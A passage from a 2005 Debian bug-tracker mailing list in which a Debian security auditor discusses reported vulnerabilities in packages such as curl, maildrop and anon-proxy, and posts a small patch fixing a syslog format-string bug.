  As does "man vncpasswd":

  "The password must be at least six characters long, and only the first eight
characters are significant"

  Perhaps a more prominent warning is required, but I consider it unlikely
 that this will be fixed if upstream is content with the current state

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#333734: curl: Buffer overflow in NTLM authentication

[Steve Kemp]

On Thu, Oct 13, 2005 at 03:03:42PM +0200, Moritz Muehlenhoff wrote:
> Package: curl
> Version: 7.14.1-5
> Severity: grave
> Tags: security
> Justification: user security hole
> 
> Another buffer overflow has been found in curl's NTLM authentication
> code. (This one is different from CAN-2005-0490 and doesn't seem to
> have a CVE assignment yet). Please see 
> http://www.mail-archive.com/wget%40sunsite.dk/msg08294.html
> for more information.

  Noted already, and an update for Sarge should be available soon.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#333682: security problem within CDDB communication

[Steve Kemp]

On Thu, Oct 13, 2005 at 10:52:28AM +0200, Michal ??iha?? wrote:

> xine announcement [1] is four day old, it says issue has been found by
> Debian Security Audit Project, so I'd expect that Debian will have it
> fixed also :-).

  We do.

> Sorry if you're already working on this issue and I interrupt you from
> work, but I wanted to make sure you know about this.

  Please see DSA-863, released on the 12th of October:

http://www.us.debian.org/security/2005/dsa-863

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#327722: Patch for Gopher bug CAN-2005-2772

[Steve Kemp]

On Mon, Sep 26, 2005 at 09:23:16AM -0500, John Goerzen wrote:

> >   Attached are the patches that Joey (Schulze) approved.
> 
> Can you (or Joey) comment: did you use a different patch because you
> believe mine to be insecure, or for a different reason?  (That's an
> important question, since as you know, my patch was uploaded to unstable
> and will presumably be in the next stable release.)

  Your patch looks good.

  The reason that I used the one I did was because it was created
 a few weeks ago when there was no other patch publically
 available.  Had I seen yours at the time I would have used it
 instead, rather than going with something different.

  I certainly don't think you need do anything drastic like
 use the one I made in another upload.  Although it was a 
 fair question to ask.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#325769: Format string security hole in anon-proxy

[Steve Kemp]

Package: anon-proxy
Version: 00.02.39-7
Severity: serious
Tags: patch, upstream


  The logging code in anon-proxy contains a misuse of the syslog function
 allowing potential remote compromise of the host it is running upon.

  (This depends whether logging is enabled).

  The patch below fixes the issue.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit

--- CAMsg.cpp-orig  2005-08-29 21:17:42.0 +0100
+++ CAMsg.cpp   2005-08-29 21:18:30.0 +0100
@@ -124,7 +124,7 @@
{
case MSG_LOG:
#ifndef _WIN32
-   
syslog(type,oMsg.m_strMsgBuff);
+   
syslog(type,"%s",oMsg.m_strMsgBuff);
#endif
break;
case MSG_FILE:
[EMAIL PROTECTED]:/tmp/anon-proxy-00.02.39$ 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#325135: maildrop: lockmail doesn't drop privileges

[Steve Kemp]

On Sat, Aug 27, 2005 at 07:03:55PM -0400, Andres Salomon wrote:

> >   Certainly.  Once the advisory is out I can make an upload if Joy
> >  hasn't already made one.
> > 
> 
> I can also do an upload; Joy already said I should comaintain, I've just
> been waiting for racke to do a new courier upload so that I can actually
> use maildrop (I have new maildrop packages in experimental that're just
> rotting away, waiting).

  I'll leave it to you then, unless you tell me differently.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#325135: maildrop: lockmail doesn't drop privileges

[Steve Kemp]

On Sat, Aug 27, 2005 at 12:27:51PM +0200, Martin Schulze wrote:

> Thanks a lot for the report.  This is CAN-2005-2655.
> 
> > The bug affects 1.5.3-1.1 sarge/etch/sid and 1.8.1-2 in experimental,
> > and should be easy to fix: Just add setgid(getgid()) before the
> > execvp(). I tested the attached patch briefly and verified that it
> > builds and prevents this bug.
> 
> Steve, could you take care of sid and experimental packages if Joy
> is too busy?

  Certainly.  Once the advisory is out I can make an upload if Joy
 hasn't already made one.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]